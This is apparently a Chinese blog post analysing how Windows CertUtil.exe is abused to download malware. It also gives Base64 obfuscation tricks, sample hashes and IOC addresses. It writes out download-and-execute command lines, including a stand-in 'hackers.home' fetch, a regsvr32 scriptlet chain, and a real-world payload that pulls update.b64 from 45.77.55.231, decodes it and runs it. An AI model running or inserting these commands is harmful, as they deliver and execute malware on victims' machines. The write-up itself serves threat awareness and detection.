php 获取远程文件mine,使用CertUtil.exe下载远程文件

最新推荐文章于 2024-06-06 10:18:12 发布
最新推荐文章于 2024-06-06 10:18:12 发布
阅读量245 收藏 1
点赞数
文章标签: php 获取远程文件mine

使用CertUtil.exe下载远程文件

1、前言

经过国外文章信息,CertUtil.exe下载恶意软件的样本。

2、实现原理

Windows有一个名为CertUtil的内置程序,可用于在Windows中管理证书。使用此程序可以在Windows中安装,备份,删除,管理和执行与证书和证书存储相关的各种功能。

CertUtil的一个特性是能够从远程URL下载证书或任何其他文件。

使用语法 :

"certutil.exe -urlcache -split -f [URL] output.file"

Casey Smith(https://twitter.com/subTee) 在2017年就已经公布的相关利用方法。

certutil -urlcache -split -f [serverURL] file.blah regsvr32.exe /s /u /I:file.blah scrub.dll

3、实际例子

目前在威胁情报平台里已经可以搜索到利用这种手法的相关病毒样本,样本中利用的方法:

8dcef4b9aba0edf2a623b144b7559215.png

4、混淆方式

使用CertUtil + Base64来绕过安全软件

通过Base64对恶意文件进行编码,使恶意代码样本看起来像是无害的文本文件,然后使用CertUtil.exe下载后对其进行解码。下载了文本文件使用“Certutil.exe -decode”命令将Base64编码文件解码为可执行文件。

C:\Temp>certutil.exe -urlcache -split -f "https://hackers.home/badcontent.txt" bad.txt

C:\Temp>certutil.exe -decode bad.txt bad.exe

在F5 Labs上有一篇利用漏洞的文章中提到了利用certutil下载文件的方式攻击Web服务器。Payload部分内容如下:

f213f4545c994907b3e43000031566b9.png

一旦文件下载并使用certutil进行 base64解码,它将被保存为update.exe并执行。

certutil -urlcache -split -f http://45.77.55.231/update.b64 update.b64&certutil -decode update.b64 update.exe&update.exe

5、样本HASH与分析结果

分析平台分析结果:

https://www.hybrid-analysis.com/sample/87cf118bff58c38bc0d54c1d3fcc553e381df838437a99a2006dd8f726406c16?environmentId=100

https://www.virustotal.com/en/file/1a3cd50fcc7a454025a641ffcc941353b4a7998c36066b399c72cb8cbff61071/analysis/1522278762/ https://www.hybrid-analysis.com/sample/4faf0c88f41121038709e9a9d134736dfadf6e1f1f4fdb6812fc69818a9e8572?environmentId=100 https://www.hybrid-analysis.com/sample/3bdecb8b3aaad6822a15011e5c9f10663c3ead64a61350148518b32f176ba02c?environmentId=100

IOC(Indicators of Compromise)

IP:

45[.]77[.]55[.]231

181[.]214[.]87[.]240 181[.]214[.]87[.]241 148[.]251[.]133[.]246

文件名与HASH值:

update.b64: 66107b01bc93c8d4cf2e8a6a8faffb56

update.exe: 5bb5d3cb837d97174eddc681ca98aa80

msi64.zip: 8d8b8abe93aea52f9865f045a49912ae SearchIndexer.exe: 1dd8ea5dd6975eb3d0dd14d71d1a404d mssearch.exe: 47d3a5023d0cbe76a030bfac7bcfe2f2

6、参考

=========================== End

嗷呜哈
关注
LOLBins——利用证书校验程序Certutil.exe和CertReq.exe
摔不死的笨鸟的博客
07-21 376
LOLBins
WXCertUtil.exe
04-16
使大家在下载的时候更便捷
certutil.exe
03-04
补充操作系统缺失感染文件!用于Der Spaeher &shy修复
php 获取远程文件mine,atom 编辑远程服务器上的目录 remote ftp
weixin_39550587的博客
03-24 85
{"protocol": "sftp","host": "example.com", // string - Hostname or IP address of the server. Default: 'localhost'"port": 22, // integer - Port number of the server. Default: 22"user": "user", // strin...
php 获取mine,PHP文件上传类型后辍名对应mine对照表
weixin_42499332的博客
03-22 322
$temppath=$upfile['tmp_name'];$fileinfo=pathinfo($upfile['name']);$extension=$upfile['type'];//echo $extension;//exit;switch( $extension ){case 'application/msword':$extension ='doc';break;case 'appli...
php 获取mine,PHP文件上传类型后辍名对应mine对照表_PHP教程
weixin_39609887的博客
03-22 205
$temppath=$upfile['tmp_name'];$fileinfo=pathinfo($upfile['name']);$extension=$upfile['type'];//echo $extension;//exit;switch( $extension ){case 'application/msword':$extension ='doc';break;case 'appli...
渗透中Windows利用Certutil进行文件下载
大河之犬的博客
09-26 2705
是一个合法Windows文件,用于管理Windows证书的程序。此合法Windows服务现已被广泛滥用于恶意用途渗透中主要利用其下载、编码、解码、替代数据流等功能可以在命令行用certutil -?
利用certutil.exe实现在批处理(bat)中嵌入exe文件的方法
09-21
1. **文件编码**:首先,使用`certutil.exe`的`-encode`选项将二进制文件转换为Base64编码格式的文本文件。 2. **文本嵌入**:将上述生成的Base64编码文本直接嵌入到批处理脚本中。 3. **文件解码**:在批处理脚本...
certutil.exe.mui
01-04
certutil.exe
Certutil工具(Windows命令行下载常用)
热门推荐
bring_coco的博客
05-28 3万+
Certutil包含一个编码参数(编码)。这有助于在Base64中编码文件的内容。这是在Windows中等效于Linux中的base64命令。不能打开.exe可执行文件时候,可以使用certutil对可执行文件进行编码。然后传输编码后的数据,然后在接收机上对其进行解码。这里创建一个名为test.txt的文本文件,输入一些内容,打开powershell命令:Add-Content test.txt “ni hao”编码(base64)
php获取文件mime类型的几种方法
lan_13217的专栏
08-25 595
 MIME类型就是设定某种扩展名的文件用一种应用程序来打开的方式类型,当该扩展名文件被访问的时候,浏览器会自动使用指定应用程序来打开。多用于指定一些客户端自定义的文件名,以及一些媒体文件打开方式。 php获取文件mime类型有以下几种方法: 1、mime_content_type()函数判断获取mime类型  mime_content_type返回指定文件的MIME类型, 用法:ech...
利用certutil.exe实现在批处理(bat)中嵌入可执行文件或者各种媒体、图片之类二进制文件的简单方法
henianyou的博客
09-04 1902
实际上利用certutil.exe 把二进制文件(包括各种文件exe可执行程序,图片,声音,mp3) 经过base64编码为文本,可以实现把这些文件嵌入到批处理代码中。 有什么用?: 举个例子,批处理经常需要依赖其它命令行工具实现自动化脚本,如果把这些工具转成文本嵌入到代码中,贴到网上就可以直接把可用的代码发出去了。不需要上传附件。 缺点: base64编码后的文本比原文件长1/3,加上...
Windows certutil.exe 命令 简单举例 计算MD5与SHA1/256
mihaoyun.com的专栏
11-11 1110
Certutil 是 Windows 操作系统上预装的工具,是一个 CLI 程序,可用于转储和显示证书颁发机构(CA),配置信息,证书服务, CA 组件的备份和还原以及验证证书、密钥对和证书链, 校验文件MD5、SHA1、SHA256等,它作为证书服务的一部分安装。以下仅为部分简单示例: 校验文件MD5、SHA1、SHA256 certutil -hashfile yourfilename.ext MD5 certutil -hashfile yourfilename.ext SHA1 certut
CertUtil.exe被利用来下载恶意软件
weixin_30312659的博客
04-06 2089
1、前言 经过国外文章信息,CertUtil.exe下载恶意软件的样本。 2、实现原理 Windows有一个名为CertUtil的内置程序,可用于在Windows中管理证书。使用此程序可以在Windows中安装,备份,删除,管理和执行与证书和证书存储相关的各种功能。 CertUtil的一个特性是能够从远程URL下载证书或任何其他文件使用语法 : "certutil.exe -url...
php文件上传及mime类型大全
weixin_34191734的博客
06-10 224
一些题外话,抱怨一下,不要介意。还是进入正题吧,我这里讨论很浅,仅仅是思路,以上传txt格式的文件为例,深层次的扩展这里就不讨论了,因此这篇文章只适合PHP初学者,对高手来说可能没有什么意义。好,我们开始。首先要建立一个文件夹和两个文件,具体如下:File              —————— 文件夹,用于存放上传的文件。choose.htm   —————— htm文件,用于选择上传的文件。u...
certutil(certutilexe应用程序错误)
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
02-25 3662
证书错误导航已阻止怎么解决 一、修改电脑系统时间 出现证书错误 导航已阻止这种问题最常见的原因便是电脑本地时间不正确导致的。自然解决方法便是同步电脑本地系统时间可以了。 找到Internet时间—更改设置—与Internet时间服务器同步—立即更新。确认保存可以了。 二、删除微软系统补丁 如果本地时间正确无误,或...
启动应用程序出现certutil.exe找不到问题解决
最新发布
wbcmbfy的博客
06-06 1544
其实很多用户玩单机游戏或者安装软件的时候就出现过这种问题,如果是新手第一时间会认为是软件或游戏出错了,其实并不是这样,其主要原因就是你电脑系统的该dll文件丢失了或没有安装一些系统软件平台所需要的动态链接库,这时你可以下载这个certutil.exe文件(挑选合适的版本文件)把它放入到程序或系统目录中,当我们执行某一个.exe程序时,相应的DLL文件就会被调用,因此将缺失的文件放回到原目录之后就能打开你的软件或游戏了.那么出现certutil.exe丢失要怎么解决?
Windows7系统certutil.exe文件丢失问题
amio555的专栏
12-29 2332
其实很多用户玩单机游戏或者安装软件的时候就出现过这种问题,如果是新手第一时间会认为是软件或游戏出错了,其实并不是这样,其主要原因就是你电脑系统的该dll文件丢失了或没有安装一些系统软件平台所需要的动态链接库,这时你可以下载这个certutil.exe文件(挑选合适的版本文件)把它放入到程序或系统目录中,当我们执行某一个.exe程序时,相应的DLL文件就会被调用,因此将缺失的文件放回到原目录之后就能打开你的软件或游戏了.那么出现certutil.exe丢失要怎么解决?
Windows上自带的渗透测试工具:Certutil
2301_79205724的博客
08-31 1032
Certutil 是 Windows 操作系统上预装的工具,可用于 校验文件MD5、SHA1、SHA256,下载恶意文件和免杀。下面,将介绍它在 Windows 渗透测试中的作用。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值